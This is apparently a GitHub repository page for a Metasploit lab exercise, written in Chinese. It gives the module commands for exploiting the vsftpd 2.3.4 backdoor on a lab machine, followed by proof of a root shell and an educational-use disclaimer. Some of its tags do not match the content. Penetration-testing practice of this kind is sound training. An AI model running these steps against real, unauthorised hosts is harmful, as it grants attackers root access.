Pashayev-1/Metasploit-Exploitation-Lab-VSFTPD

GitHub: Pashayev-1/Metasploit-Exploitation-Lab-VSFTPD

演示如何利用 vsftpd 2.3.4 后门漏洞并获得 root 权限的 Metasploit 实验。

Stars: 0 | Forks: 0

# Metasploit-Exploitation-Lab-VSFTPD 一个综合性的实验室练习,专注于识别并利用 vsftpd 2.3.4 后门漏洞,使用 Metasploit 框架进行演示。该项目展示了在受控环境中进行网络枚举、漏洞评估和权限提升的方法。 ## 利用 vsftpd 2.3.4 后门 在识别出易受攻击的 FTP 服务后,我使用 Metasploit 框架利用了 vsftpd 2.3.4 后门漏洞。 ### 步骤 1. 启动 Metasploit(msfconsole) 2. 搜索漏洞: search vsftpd 3. 选择漏洞利用: use exploit/unix/ftp/vsftpd_234_backdoor 4. 设置目标: set RHOSTS 10.0.2.x 5. 执行利用: run ### 结果 成功获得了 root 权限的 Shell 访问。 ### 证明 whoami → root uname -a → Linux metasploitable pwd → / ### 截图 ![Metasploit](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/96970ee6f0234210.jpg) ![Exploit](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/52ac8d0389234211.jpg) ![Root Shell](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/826fac8561234213.jpg) ### 解释 该漏洞由于 FTP 服务中的后门存在,允许攻击者获得未经授权的 root 访问权限。 ### 注意 此操作仅在受控实验室环境中出于教育目的进行。
标签:2.3.4, AES-256, CISA项目, CSV导出, Privilege Escalation, Root Shell, Unix FTP 漏洞, vsftpd, Web报告查看器, 协议分析, 后门漏洞, 威胁模拟, 安全实验, 实验室, 开源渗透测试, 控制环境, 攻击模拟, 教学演示, 权限提升, 漏洞评估, 网络枚举, 驱动签名利用